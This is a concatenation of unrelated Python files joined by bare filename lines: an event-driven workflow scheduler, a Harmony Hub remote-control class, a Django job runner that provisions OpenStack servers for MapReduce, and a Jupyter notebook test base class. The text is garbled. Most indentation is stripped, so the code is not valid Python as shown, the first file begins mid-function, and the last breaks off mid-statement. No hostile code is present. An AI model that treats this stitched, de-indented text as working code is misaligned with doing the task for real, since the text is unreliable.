return None
def _update_dag_next_dagrun(self, dag_id, session):
"""
Bulk update the next_dagrun and next_dagrun_create_after for all the dags.
We batch the select queries to get info about all the dags at once
"""
active_runs_of_dag = session \
.query(func.count('*')).filter(
DagRun.dag_id == dag_id,
DagRun.state == State.RUNNING,
DagRun.external_trigger.is_(False),
).scalar()
dag_model = session \
.query(DagModel).filter(DagModel.dag_id == dag_id).first()
dag = self.dagbag.get_dag(dag_id, session=session)
if dag.max_active_runs and active_runs_of_dag >= dag.max_active_runs:
self.log.info(
"DAG %s is at (or above) max_active_runs (%d of %d), not creating any more runs",
dag.dag_id,
active_runs_of_dag,
dag.max_active_runs,
)
dag_model.next_dagrun_create_after = None
else:
dag_model.next_dagrun, dag_model.next_dagrun_create_after = dag.next_dagrun_info(
dag_model.next_dagrun
)
def _schedule_task(self, scheduling_event: TaskSchedulingEvent):
task_key = TaskInstanceKey(
scheduling_event.dag_id,
scheduling_event.task_id,
scheduling_event.execution_date,
scheduling_event.try_number
)
self.executor.schedule_task(task_key, scheduling_event.action)
def _find_dagruns_by_event(self, event, session) -> Optional[List[DagRun]]:
affect_dag_runs = []
event_key = EventKey(event.key, event.event_type, event.namespace, event.sender)
dag_runs = session \
.query(DagRun).filter(DagRun.state == State.RUNNING).all()
self.log.debug('dag_runs {}'.format(len(dag_runs)))
if dag_runs is None or len(dag_runs) == 0:
return affect_dag_runs
dags = session.query(SerializedDagModel).filter(
SerializedDagModel.dag_id.in_(dag_run.dag_id for dag_run in dag_runs)
).all()
self.log.debug('dags {}'.format(len(dags)))
affect_dags = {}
for dag in dags:
self.log.debug('dag config {}'.format(dag.event_relationships))
self.log.debug('event key {} {} {}'.format(event.key, event.event_type, event.namespace))
dep: DagEventDependencies = DagEventDependencies.from_json(dag.event_relationships)
if dep.is_affect(event_key):
context_extractor: ContextExtractor = dag.context_extractor
try:
event_context: EventContext = context_extractor.extract_context(event)
except Exception as e:
self.log.error(
"Failed to call context extractor, dag {} skips event {}".format(dag.dag_id, event),
exc_info=e)
continue
if event_context is not None:
affect_dags[dag.dag_id] = event_context
if len(affect_dags) == 0:
return affect_dag_runs
for dag_run in dag_runs:
if dag_run.dag_id in affect_dags:
event_context: EventContext = affect_dags[dag_run.dag_id]
if event_context.is_broadcast() or dag_run.context in event_context.get_contexts():
affect_dag_runs.append(dag_run)
return affect_dag_runs
def _find_scheduled_tasks(
self,
dag_run: DagRun,
session: Session,
check_execution_date=False
) -> Optional[List[TI]]:
"""
Make scheduling decisions about an individual dag run
``currently_active_runs`` is passed in so that a batch query can be
used to ask this for all dag runs in the batch, to avoid an n+1 query.
:param dag_run: The DagRun to schedule
:return: scheduled tasks
"""
if not dag_run or dag_run.get_state() in State.finished:
return
try:
dag = dag_run.dag = self.dagbag.get_dag(dag_run.dag_id, session=session)
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_run.dag_id)
return None
if not dag:
self.log.error("Couldn't find dag %s in DagBag/DB!", dag_run.dag_id)
return None
currently_active_runs = session.query(
TI.execution_date,
).filter(
TI.dag_id == dag_run.dag_id,
TI.state.notin_(list(State.finished)),
).distinct().all()
if check_execution_date and dag_run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.warning("Execution date is in future: %s", dag_run.execution_date)
return None
if dag.max_active_runs and not dag.is_long_running_dag():
if (
len(currently_active_runs) >= dag.max_active_runs
and dag_run.execution_date not in currently_active_runs
):
self.log.warning(
"DAG %s already has %d active runs, not queuing any tasks for run %s",
dag.dag_id,
len(currently_active_runs),
dag_run.execution_date,
)
self._verify_integrity_if_dag_changed(dag_run=dag_run, session=session)
schedulable_tis, callback_to_run = dag_run.update_state(session=session, execute_callbacks=False)
dag_run.schedule_tis(schedulable_tis, session)
session.commit()
query = (session.query(TI)
.outerjoin(TI.dag_run)
.filter(DR.run_id == dag_run.run_id)
.join(TI.dag_model)
.filter(not_(DM.is_paused))
.filter(TI.state == State.SCHEDULED)
.options(selectinload('dag_model')))
scheduled_tis: List[TI] = with_row_locks(
query,
of=TI,
**skip_locked(session=session),
).all()
return scheduled_tis
def _find_downstream_tasks(self, task_id, dag_run, session) -> Optional[List[TI]]:
tasks = self._find_scheduled_tasks(dag_run, session)
if not tasks or len(tasks) == 0:
return None
dag = self.dagbag.get_dag(dag_run.dag_id, session=session)
downstream_task_ids = dag.task_dict.get(task_id).downstream_task_ids
res = []
for task in tasks:
if task.task_id in downstream_task_ids:
res.append(task)
return res
@provide_session
def _verify_integrity_if_dag_changed(self, dag_run: DagRun, session=None):
"""Only run DagRun.verify integrity if Serialized DAG has changed since it is slow"""
latest_version = SerializedDagModel.get_latest_version_hash(dag_run.dag_id, session=session)
if dag_run.dag_hash == latest_version:
self.log.debug("DAG %s not changed structure, skipping dagrun.verify_integrity", dag_run.dag_id)
return
dag_run.dag_hash = latest_version
# Refresh the DAG
dag_run.dag = self.dagbag.get_dag(dag_id=dag_run.dag_id, session=session)
# Verify integrity also takes care of session.flush
dag_run.verify_integrity(session=session)
def _send_scheduling_task_event(self, ti: Optional[TI], action: SchedulingAction):
if ti is None or action == SchedulingAction.NONE:
return
with create_session() as session:
ti.state = State.QUEUED
session.commit()
task_scheduling_event = TaskSchedulingEvent(
ti.task_id,
ti.dag_id,
ti.execution_date,
ti.try_number,
action
)
self.mailbox.send_message(task_scheduling_event.to_event())
def _send_scheduling_task_events(self, tis: Optional[List[TI]], action: SchedulingAction):
if tis is None:
return
for ti in tis:
self._send_scheduling_task_event(ti, action)
@provide_session
def _emit_pool_metrics(self, session: Session = None) -> None:
pools = models.Pool.slots_stats(session=session)
for pool_name, slot_stats in pools.items():
Stats.gauge(f'pool.open_slots.{pool_name}', slot_stats["open"])
Stats.gauge(f'pool.queued_slots.{pool_name}', slot_stats[State.QUEUED])
Stats.gauge(f'pool.running_slots.{pool_name}', slot_stats[State.RUNNING])
@staticmethod
def _reset_unfinished_task_state(dag_run):
with create_session() as session:
to_be_reset = [s for s in State.unfinished if s not in [State.RUNNING, State.QUEUED]]
tis = dag_run.get_task_instances(to_be_reset, session)
for ti in tis:
ti.state = State.NONE
session.commit()
@provide_session
def restore_unfinished_dag_run(self, session):
dag_runs = DagRun.next_dagruns_to_examine(session, max_number=sys.maxsize).all()
if not dag_runs or len(dag_runs) == 0:
return
for dag_run in dag_runs:
self._reset_unfinished_task_state(dag_run)
tasks = self._find_scheduled_tasks(dag_run, session)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
@provide_session
def heartbeat_callback(self, session: Session = None) -> None:
Stats.incr('scheduler_heartbeat', 1, 1)
@provide_session
def _process_request_event(self, event: RequestEvent, session: Session = None):
try:
message = BaseUserDefineMessage()
message.from_json(event.body)
if message.message_type == UserDefineMessageType.RUN_DAG:
# todo make sure dag file is parsed.
dagrun = self._create_dag_run(message.dag_id, session=session, run_type=DagRunType.MANUAL,
context=message.context)
if not dagrun:
self.log.error("Failed to create dag_run.")
                    # TODO Need to add ret_code and error_msg in ExecutionContext in case of exception
self.notification_client.send_event(ResponseEvent(event.request_id, None).to_event())
return
tasks = self._find_scheduled_tasks(dagrun, session, False)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
self.notification_client.send_event(ResponseEvent(event.request_id, dagrun.run_id).to_event())
elif message.message_type == UserDefineMessageType.STOP_DAG_RUN:
dag_run = DagRun.get_run_by_id(session=session, dag_id=message.dag_id, run_id=message.dagrun_id)
self._stop_dag_run(dag_run)
self.notification_client.send_event(ResponseEvent(event.request_id, dag_run.run_id).to_event())
elif message.message_type == UserDefineMessageType.EXECUTE_TASK:
dagrun = DagRun.get_run_by_id(session=session, dag_id=message.dag_id, run_id=message.dagrun_id)
ti: TI = dagrun.get_task_instance(task_id=message.task_id)
self.mailbox.send_message(TaskSchedulingEvent(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=ti.execution_date,
try_number=ti.try_number,
action=SchedulingAction(message.action)
).to_event())
self.notification_client.send_event(ResponseEvent(event.request_id, dagrun.run_id).to_event())
except Exception:
self.log.exception("Error occurred when processing request event.")
def _stop_dag(self, dag_id, session: Session):
"""
Stop the dag. Pause the dag and cancel all running dag_runs and task_instances.
"""
DagModel.get_dagmodel(dag_id, session)\
.set_is_paused(is_paused=True, including_subdags=True, session=session)
active_runs = DagRun.find(dag_id=dag_id, state=State.RUNNING)
for dag_run in active_runs:
self._stop_dag_run(dag_run)
def _stop_dag_run(self, dag_run: DagRun):
dag_run.stop_dag_run()
for ti in dag_run.get_task_instances():
if ti.state in State.unfinished:
self.executor.schedule_task(ti.key, SchedulingAction.STOP)
self.mailbox.send_message(DagRunFinishedEvent(dag_id=dag_run.dag_id,
execution_date=dag_run.execution_date).to_event())
class SchedulerEventWatcher(EventWatcher):
def __init__(self, mailbox):
self.mailbox = mailbox
def process(self, events: List[BaseEvent]):
for e in events:
self.mailbox.send_message(e)
class EventBasedSchedulerJob(BaseJob):
"""
1. todo self heartbeat
"""
__mapper_args__ = {'polymorphic_identity': 'EventBasedSchedulerJob'}
def __init__(self, dag_directory,
notification_server_uri=None,
event_start_time=None,
max_runs=-1,
refresh_dag_dir_interval=conf.getint('scheduler', 'refresh_dag_dir_interval', fallback=1),
*args, **kwargs):
super().__init__(*args, **kwargs)
if notification_server_uri is None:
notification_server_uri = conf.get('scheduler', 'notification_server_uri', fallback='127.0.0.1:50052')
self.log.info("Starting event based scheduler with notification server uri: {}".format(notification_server_uri))
self.mailbox: Mailbox = Mailbox()
self.dag_trigger: DagTrigger = DagTrigger(
dag_directory=dag_directory,
max_runs=max_runs,
dag_ids=None,
pickle_dags=False,
mailbox=self.mailbox,
refresh_dag_dir_interval=refresh_dag_dir_interval,
notification_server_uri=notification_server_uri
)
self.task_event_manager = DagRunEventManager(self.mailbox)
self.executor.set_mailbox(self.mailbox)
self.executor.set_notification_server_uri(notification_server_uri)
self.notification_client: NotificationClient = NotificationClient(server_uri=notification_server_uri,
default_namespace=SCHEDULER_NAMESPACE)
self.periodic_manager = PeriodicManager(self.mailbox)
self.scheduler: EventBasedScheduler = EventBasedScheduler(
self.id,
self.mailbox,
self.task_event_manager,
self.executor,
self.notification_client,
notification_server_uri,
None,
self.periodic_manager
)
self.last_scheduling_id = self._last_scheduler_job_id()
self.need_recover_state = False
self.last_event_version = None
if event_start_time is None:
if self.last_scheduling_id is None:
self.start_time = int(time.time() * 1000)
else:
# need recover the state of the scheduler
self.start_time, self.last_event_version = self._get_progress(self.last_scheduling_id)
self.need_recover_state = True
else:
self.start_time = event_start_time
self.log.info('Progress {} {}'.format(self.start_time, self.last_event_version))
@staticmethod
def _last_scheduler_job_id():
last_run = EventBasedSchedulerJob.most_recent_job()
if not last_run:
return None
else:
return last_run.id
@staticmethod
def _get_progress(scheduling_job_id):
progress = get_event_progress(scheduling_job_id)
if progress is None:
return int(time.time() * 1000), None
else:
return progress.last_event_time, progress.last_event_version
def _execute(self):
# faulthandler.enable()
self.log.info("Starting the scheduler Job")
# DAGs can be pickled for easier remote execution by some executors
# pickle_dags = self.do_pickle and self.executor_class not in UNPICKLEABLE_EXECUTORS
try:
self.mailbox.set_scheduling_job_id(self.id)
self.mailbox.start()
self.scheduler.id = self.id
self.dag_trigger.start()
self.task_event_manager.start()
self.executor.job_id = self.id
self.periodic_manager.start()
self.register_signals()
# Start after resetting orphaned tasks to avoid stressing out DB.
execute_start_time = timezone.utcnow()
self.scheduler.submit_sync_thread()
if self.need_recover_state:
self.scheduler.recover(self.last_scheduling_id)
self._set_event_progress()
self._start_listen_events()
self.executor.start()
self._run_scheduler_loop()
self._stop_listen_events()
self.periodic_manager.shutdown()
self.dag_trigger.end()
self.task_event_manager.end()
self.executor.end()
self.mailbox.stop()
settings.Session.remove() # type: ignore
except Exception as e: # pylint: disable=broad-except
self.log.exception("Exception when executing scheduler, %s", e)
finally:
self.log.info("Exited execute loop")
def _run_scheduler_loop(self) -> None:
self.log.info("Starting the scheduler loop.")
self.scheduler.restore_unfinished_dag_run()
should_continue = True
while should_continue:
try:
should_continue = self.scheduler.schedule()
self.heartbeat(only_if_necessary=True)
except Exception as e:
traceback.print_exc()
self.log.error('Scheduler error [%s]', traceback.format_exc())
time.sleep(1)
self.scheduler.stop_timer()
def _set_event_progress(self):
create_or_update_progress(scheduling_job_id=self.id,
last_event_time=self.start_time,
last_event_version=self.last_event_version)
def _start_listen_events(self):
watcher = SchedulerEventWatcher(self.mailbox)
self.notification_client.start_listen_events(
watcher=watcher,
start_time=self.start_time,
version=self.last_event_version
)
def _stop_listen_events(self):
self.notification_client.stop_listen_events()
def register_signals(self) -> None:
"""Register signals that stop child processes"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
signal.signal(signal.SIGUSR2, self._debug_dump)
def _exit_gracefully(self, signum, frame) -> None: # pylint: disable=unused-argument
"""Helper method to clean up processor_agent to avoid leaving orphan processes."""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
sys.exit(os.EX_OK)
def _debug_dump(self, signum, frame): # pylint: disable=unused-argument
try:
sig_name = signal.Signals(signum).name # pylint: disable=no-member
except Exception: # pylint: disable=broad-except
sig_name = str(signum)
self.log.info("%s\n%s received, printing debug\n%s", "-" * 80, sig_name, "-" * 80)
self.executor.debug_dump()
self.log.info("-" * 80)
def is_alive(self, grace_multiplier: Optional[float] = None) -> bool:
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold: int = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING
and (timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
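
# --- Illustrative sketch only (not the ai-flow/Airflow API) -------------------
# EventBasedScheduler.schedule() above pulls one message from the mailbox,
# dispatches on the concrete event type, and returns False once a stop event
# for this job arrives.  A stripped-down, queue-backed version of that loop,
# with hypothetical event classes supplied by the caller, is sketched here:
import queue

class _ToyMailbox:
    """Hypothetical stand-in for Mailbox: a plain FIFO of event objects."""
    def __init__(self):
        self._events = queue.Queue()

    def send_message(self, event):
        self._events.put(event)

    def get_message(self):
        return self._events.get()

def _toy_schedule_loop(mailbox, handlers, stop_type):
    """Dispatch each event to the handler registered for its type; stop on stop_type."""
    while True:
        event = mailbox.get_message()
        if isinstance(event, stop_type):
            return False
        handler = handlers.get(type(event))
        if handler is not None:
            handler(event)
        # unknown event types are skipped, mirroring the log-and-continue branch above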
|
schhaio.py
|
"""Provides SmartCommandsHarmonyHub for smarter interaction with a HarmonyHub"""
import asyncio
from functools import partial
from threading import Thread
from aioharmony.harmonyapi import HarmonyAPI
from aioharmony.const import SendCommandDevice
from hermes_python.ontology.injection import (InjectionRequestMessage, AddFromVanillaInjectionRequest)
class SmartCommandsHarmonyHub:
"""Class for interacting with a Harmony Hub in a smarter way"""
def __init__(self, remote_address):
"""Initialize members
remote_address: The host name or IP address of the Harmony Hub
"""
self.loop = asyncio.new_event_loop()
self.thread = Thread(target=self._asyncio_thread_loop)
self.thread.start()
self.remote_address = remote_address
self.config = None
self.activity_id = -1
self.activity_name = "Power Off"
self.command_map = {}
def _asyncio_thread_loop(self):
asyncio.set_event_loop(self.loop)
self.loop.run_forever()
async def _stop_event_loop(self):
self.loop.stop()
return self.loop.is_running()
def _reset_state_info(self):
"""Resets state-related members to their defaults"""
self.config = None
self.activity_id = -1
self.activity_name = "Power Off"
async def _run_in_loop2(self, co_routine):
# Call _connect, if it returns -1, return -1 from here,
api = await self._connect()
if api == -1:
return -1
# Otherwise, carry on
return_value = await co_routine(api)
await self._close(api)
return return_value
def _run_in_loop(self, co_routine):
future = asyncio.run_coroutine_threadsafe(
self._run_in_loop2(co_routine),
self.loop)
return future.result()
async def _close(self, api):
"""Closes the connectoion to the Harmony Hub"""
await api.close()
self._reset_state_info()
async def _connect(self):
"""Connects to the Harmony Hub"""
api = HarmonyAPI(ip_address=self.remote_address, loop=self.loop)
if await api.connect():
self.config = api.hub_config[0]
(self.activity_id, self.activity_name) = api.current_activity
return api
        return -1  # match the -1 failure convention that _run_in_loop2 checks for
def _get_channel_separator(self):
return "."
def _get_commands_payload(self, commands):
return AddFromVanillaInjectionRequest({"harmony_hub_command": commands})
def _get_activities_payload(self, activities):
return AddFromVanillaInjectionRequest({"harmony_hub_activities_name": activities})
async def _get_update_payload(self, _):
""" Finds all the commands and returns a payload for injecting
commands """
operations = []
activities = []
commands = []
self.command_map = {}
for activity in self.config["activity"]:
activities.append(activity["label"])
for cgroups in activity["controlGroup"]:
for fncn in cgroups["function"]:
(label_key, voice_command) = self._label_to_key_and_voice_command(fncn["label"], activity["id"])
commands.append(voice_command)
self.command_map[label_key] = {}
# Initialize command to fncn["name"], in case we
# can't find better
self.command_map[label_key]["command"] = fncn["name"]
# Find better...
idx = fncn["action"].find("command")
if idx != -1:
idx += 10
ridx = fncn["action"].find("\"", idx)
if ridx != -1:
self.command_map[label_key]["command"] = fncn["action"][idx:ridx]
# Next, find the device to use
ridx = fncn["action"].rfind("\"")
idx = fncn["action"].find("deviceId")
if idx == -1:
idx = ridx - 8
else:
idx += 11
self.command_map[label_key]["device"] = fncn["action"][idx:ridx]
operations.append(self._get_activities_payload(activities))
operations.append(self._get_commands_payload(list(set(commands))))
return InjectionRequestMessage(operations)
def _label_to_key_and_voice_command(self, label, activity):
""" Return the key for command_map for the given label and activity"""
if label == "0":
label = "zero"
elif label == "1":
label = "one"
elif label == "2":
label = "two"
elif label == "3":
label = "three"
elif label == "4":
label = "four"
elif label == "5":
label = "five"
elif label == "6":
label = "six"
elif label == "7":
label = "seven"
elif label == "8":
label = "eight"
elif label == "9":
label = "nine"
voice_command = label
return (activity + "_" + label.lower().replace(" ", "_"), voice_command)
def _map_command(self, command):
"""Maps from a command label to a command"""
label_key = self._label_to_key_and_voice_command(command, str(self.activity_id))[0]
if label_key in self.command_map.keys():
return self.command_map[label_key]
return None
async def _change_channel(self, which_channel, api):
# Note that we have to call send_to_hub directly, because the
# HarmonyAPI assumes channel must be an int, which doesn't work
# with digital channels
params = {
'timestamp': 0,
'channel': which_channel
}
response = await api._harmony_client.send_to_hub(
command='change_channel',
params=params)
if not response:
return 0
return 1 if response.get('code') == 200 else 0
def change_channel(self, channel_slot):
"""Changes to the specified channel, being sure that if digital
channels are used, that it uses the correct separator style.
"""
which_channel = ""
dot_reached = False
sub_channel = 0
for idx in range(len(channel_slot)):
if channel_slot[idx].isdigit() and not dot_reached:
which_channel += channel_slot[idx]
elif channel_slot[idx] == "." or channel_slot[idx] == ",":
which_channel += self._get_channel_separator()
dot_reached = True
idx += 1
break
if dot_reached:
if len(channel_slot) > idx:
sub_channel = int(channel_slot[idx])
if len(channel_slot) > idx+1 and int(channel_slot[idx+1]) >= 5:
sub_channel += 1
which_channel += str(sub_channel)
return self._run_in_loop(partial(self._change_channel, which_channel))
async def _send_command(self, command, repeat, delay, api):
mapped_command = self._map_command(command)
if mapped_command is None:
return 0
send_commands = []
for _ in range(repeat):
send_commands.append(SendCommandDevice(device=mapped_command["device"], command=mapped_command["command"], delay=delay))
if len(send_commands) == 0:
return 0
await api.send_commands(send_commands)
return 1
def send_command(self, command, repeat, delay=0.1):
"""Sends command to the Harmony Hub repeat times"""
return self._run_in_loop(partial(self._send_command, command, repeat, delay))
async def _list_activities(self, _):
activities = []
for x in self.config["activity"]:
activities.append(x["label"])
return activities
def list_activities(self):
"""Returns a list of activities"""
return self._run_in_loop(partial(self._list_activities))
async def _current_activity(self, _):
return (self.activity_id, self.activity_name)
def current_activity(self):
"""Returns the ID and name of the current activity"""
return self._run_in_loop(partial(self._current_activity))
async def _start_activity(self, activity_name, api):
if activity_name == self.activity_name:
return -2
activity_id = api.get_activity_id(activity_name)
if activity_id is None:
return -3
ret_value = await api.start_activity(activity_id)
if ret_value:
return 1
return 0
def start_activity(self, activity_name):
"""Starts an activity on the Harmony Hub"""
return self._run_in_loop(partial(self._start_activity, activity_name))
def power_off(self):
"""Sets the current activity of the Harmony Hub to -1, AKA "PowerOff"."""
return self.start_activity("PowerOff")
def get_injection_payload(self):
"""Injects the list of activities known to the Harmony Hub"""
payload = self._run_in_loop(partial(self._get_update_payload))
if payload == -1:
return None
return payload
def close(self):
future = asyncio.run_coroutine_threadsafe(
self._stop_event_loop(),
self.loop)
self.thread.join()
return
__all__ = ["SmartCommandsHarmonyHub"]
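
# --- Hedged usage sketch (not part of this module) ----------------------------
# How SmartCommandsHarmonyHub above might be driven end to end.  The hub
# address, activity label and command names are hypothetical; they must match
# whatever is configured on your Harmony Hub.
if __name__ == "__main__":
    hub = SmartCommandsHarmonyHub("192.168.1.50")   # hypothetical hub address
    try:
        print(hub.list_activities())                # e.g. ["Watch TV", "PowerOff"]
        hub.start_activity("Watch TV")              # activity label must exist on the hub
        hub.send_command("Volume Up", repeat=3)     # mapped via the injected command labels
        hub.change_channel("7.1")                   # digital sub-channel handled above
    finally:
        hub.power_off()
        hub.close()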
|
process.py
|
from django.core.files import File
from mapred.fabric import fabfile
from mapred import compute
from mapred.models import Server
from mapred.objects import OSServer
from multiprocessing import Process
import time
import os
#import pdb
class DTimer(object): # dynamic timer ...
pass
def _execute(request, job, form, media_root):
######### virtual machine creation #########
api_token_url = request.session['api_token_url']
api_token = api_token_url['api_token']
compute_url = api_token_url['compute_url']
image_id = compute.get_image_id(api_token, compute_url)
keypair = compute.gen_keypair(api_token, compute_url)
server_count = form.cleaned_data['server_count']
server_name = form.cleaned_data['server_name']
flavor_id = form.cleaned_data['flavor']
timer = DTimer()
timer.deploystart = time.time()
try:
server_id_list = compute.create_servers(api_token, compute_url,
keypair['key_name'], server_count, server_name,
image_id, flavor_id)
while True:
#sleep and retry until an ipv4 had been set
try:
#time.sleep(server_count * 4)
time.sleep(0.1)
os_server_list = OSServer.from_json_list(
compute.get_server_info(api_token, compute_url, server_id_list))
break
except KeyError:
pass
flavor = request.session['flavors_dict'][flavor_id]
for os_server in os_server_list:
server = Server(job=job, openstack_id=os_server.id,
server_name=os_server.name, vcpus=flavor.vcpus,
ram=flavor.ram, disk=flavor.disk)
server.save()
#FABRIC
fabfile.set_key(
abs_file_path='{0}/{1}/job_{2}/'.format(
media_root, request.user.username, job.pk),
file_name=keypair['key_name'] + '.pem',
priv_key=keypair['private_key'])
fabfile.set_hadoop_ram(flavor.ram)
fabfile.set_master_ips(priv_ipv4=os_server_list[0].private_ipv4,
pub_ipv4=os_server_list[0].public_ipv4)
fabfile.set_slaves_ips(
priv_ipv4_list=[os_server.private_ipv4 for os_server in os_server_list],
pub_ipv4_list=[os_server.public_ipv4 for os_server in os_server_list])
fabfile.set_input_filename(abs_file_path=job.file_input.path)
fabfile.set_mapred_job_filename(abs_file_path=job.mapred_job.path)
fabfile.set_mapred_job_impl_class(fq_class_name=job.fully_qualified_job_impl_class)
fabfile.set_output_path(output_path=job.output_path())
#configure, process job and download results from guest
fabfile.start(timer)
#attach output_file to job model
full_output_file_name = '{0}/{1}'.format(job.output_path(),
fabfile.get_output_file_name())
full_output_cloned_file_name = full_output_file_name + '-clone'
os.rename(full_output_file_name, full_output_cloned_file_name)
with open(full_output_cloned_file_name) as f:
output_file = File(f)
job.file_output.save(name=fabfile.get_output_file_name(),
content=output_file)
os.remove(full_output_cloned_file_name)
finally:
#stop and clean
#delete keypair and servers from openstack
timer.cleanupstart = time.time()
fabfile.stop()
fabfile.delete_keypair()
compute.delete_keypair(api_token, compute_url, keypair['key_name'])
compute.delete_servers(api_token, compute_url, server_id_list)
#erase files from controller node
timer.processingend = time.time()
#print processing times
        print('\n###################################')
        print('## user: {0} ## job: {1:5d}'.format(request.user.username, job.id))
        print('###################################')
        print('## deploying time # {0:>4.1f} s'.format(timer.hadoopwfconfstart - timer.deploystart))
        print('## configuring time # {0:>4.1f} s'.format(timer.hadoopmapredstart - timer.hadoopwfconfstart))
        print('## mapreducing time # {0:>4.1f} s'.format(timer.hadoopmapredend - timer.hadoopmapredstart))
        print('## cleaning up time # {0:>4.1f} s'.format(timer.processingend - timer.cleanupstart))
        print('###################################')
        print('## total running time # {0:>.1f} s'.format(timer.processingend - timer.deploystart))
        print('###################################\n')
#################################################################################
def run_mapred_job(request, job, job_form, media_root):
Process(target=_execute, args=[request,job,job_form, media_root]).start()
#_execute(request,job,job_form,media_root)
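
# --- Illustrative sketch (hypothetical names) ----------------------------------
# run_mapred_job above starts the whole job in a detached Process so the web
# request can return immediately.  The same fire-and-forget pattern, with the
# DTimer-style stage timing kept inside the worker process, in isolation:
def _demo_job(label):
    timer_obj = DTimer()                  # timing lives inside the worker process
    timer_obj.start = time.time()
    time.sleep(0.2)                       # stand-in for deploy/configure/mapreduce work
    timer_obj.end = time.time()
    print('## {0} took {1:>4.1f} s'.format(label, timer_obj.end - timer_obj.start))

def _demo_fire_and_forget():
    worker = Process(target=_demo_job, args=['demo-job'])
    worker.start()                        # caller returns immediately, like run_mapred_job
    return worker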
|
launchnotebook.py
|
"""Base class for notebook tests."""
from __future__ import print_function
from binascii import hexlify
from contextlib import contextmanager
import errno
import os
import sys
from threading import Thread, Event
import time
from unittest import TestCase
pjoin = os.path.join
from unittest.mock import patch
import requests
from tornado.ioloop import IOLoop
import zmq
import jupyter_core.paths
from traitlets.config import Config
from ..notebookapp import NotebookApp
from ..utils import url_path_join
from ipython_genutils.tempdir import TemporaryDirectory
MAX_WAITTIME = 30 # seconds to wait for notebook server to start
POLL_INTERVAL = 0.1 # time between attempts
# TimeoutError is a builtin on Python 3. This can be removed when we stop
# supporting Python 2.
class TimeoutError(Exception):
pass
class NotebookTestBase(TestCase):
"""A base class for tests that need a running notebook.
    This creates some empty config and runtime directories
and then starts the notebook server with them.
"""
port = 12341
config = None
# run with a base URL that would be escaped,
# to test that we don't double-escape URLs
url_prefix = '/a%40b/'
@classmethod
def wait_until_alive(cls):
"""Wait for the server to be alive"""
url = cls.base_url() + 'api/contents'
for _ in range(int(MAX_WAITTIME/POLL_INTERVAL)):
try:
requests.get(url)
except Exception as e:
if not cls.notebook_thread.is_alive():
raise RuntimeError("The notebook server failed to start")
time.sleep(POLL_INTERVAL)
else:
return
raise TimeoutError("The notebook server didn't start up correctly.")
@classmethod
def wait_until_dead(cls):
"""Wait for the server process to terminate after shutdown"""
cls.notebook_thread.join(timeout=MAX_WAITTIME)
if cls.notebook_thread.is_alive():
raise TimeoutError("Undead notebook server")
@classmethod
def auth_headers(cls):
headers = {}
if cls.token:
headers['Authorization'] = 'token %s' % cls.token
return headers
@classmethod
def request(cls, verb, path, **kwargs):
"""Send a request to my server
with authentication and everything.
"""
headers = kwargs.setdefault('headers', {})
headers.update(cls.auth_headers())
response = requests.request(verb,
url_path_join(cls.base_url(), path),
**kwargs)
return response
@classmethod
def get_patch_env(cls):
return {
'HOME': cls.home_dir,
'PYTHONPATH': os.pathsep.join(sys.path),
'IPYTHONDIR': pjoin(cls.home_dir, '.ipython'),
'JUPYTER_NO_CONFIG': '1', # needed in the future
'JUPYTER_CONFIG_DIR' : cls.config_dir,
'JUPYTER_DATA_DIR' : cls.data_dir,
'JUPYTER_RUNTIME_DIR': cls.runtime_dir,
}
@classmethod
def get_argv(cls):
return []
@classmethod
def setup_class(cls):
cls.tmp_dir = TemporaryDirectory()
def tmp(*parts):
path = os.path.join(cls.tmp_dir.name, *parts)
try:
os.makedirs(path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
return path
cls.home_dir = tmp('home')
data_dir = cls.data_dir = tmp('data')
config_dir = cls.config_dir = tmp('config')
runtime_dir = cls.runtime_dir = tmp('runtime')
cls.notebook_dir = tmp('notebooks')
cls.env_patch = patch.dict('os.environ', cls.get_patch_env())
cls.env_patch.start()
cls.path_patch = patch.multiple(
jupyter_core.paths,
SYSTEM_JUPYTER_PATH=[tmp('share', 'jupyter')],
ENV_JUPYTER_PATH=[tmp('env', 'share', 'jupyter')],
SYSTEM_CONFIG_PATH=[tmp('etc', 'jupyter')],
ENV_CONFIG_PATH=[tmp('env', 'etc', 'jupyter')],
)
cls.path_patch.start()
config = cls.config or Config()
config.NotebookNotary.db_file = ':memory:'
cls.token = hexlify(os.urandom(4)).decode('ascii')
started = Event()
def start_thread():
if 'asyncio' in sys.modules:
import asyncio
asyncio.set_event_loop(asyncio.new_event_loop())
app = cls.notebook = NotebookApp(
port=cls.port,
port_retries=0,
open_browser=False,
config_dir=cls.config_dir,
data_dir=cls.data_dir,
runtime_dir=cls.runtime_dir,
notebook_dir=cls.notebook_dir,
base_url=cls.url_prefix,
config=config,
allow_root=True,
token=cls.token,
)
# don't register signal handler during tests
app.init_signal = lambda : None
# clear log handlers and propagate to root for nose to capture it
# needs to be redone after initialize, which reconfigures logging
app.log.propagate = True
app.log.handlers = []
app.initialize(argv=cls.get_argv())
app.log.propagate = True
app.log.handlers = []
loop = IOLoop.current()
loop.add_callback(started.set)
try:
app.start()
finally:
# set the event, so failure to start doesn't cause a hang
started.set()
app.session_manager.close()
cls.notebook_thread = Thread(target=start_thread)
cls.notebook_thread.daemon = True
cls.notebook_thread.start()
started.wait()
cls.wait_until_alive()
@classmethod
def teardown_class(cls):
cls.notebook.stop()
cls.wait_until_dead()
cls.env_patch.stop()
cls.path_patch.stop()
cls.tmp_dir.cleanup()
# cleanup global zmq Context, to ensure we aren't leaving dangling sockets
def cleanup_zmq():
zmq.Context.instance().term()
t = Thread(target=cleanup_zmq)
t.daemon = True
t.start()
t.join(5) # give it a few seconds to clean up (this should be immediate)
# if term never returned, there's zmq stuff still open somewhere, so shout about it.
if t.is_alive():
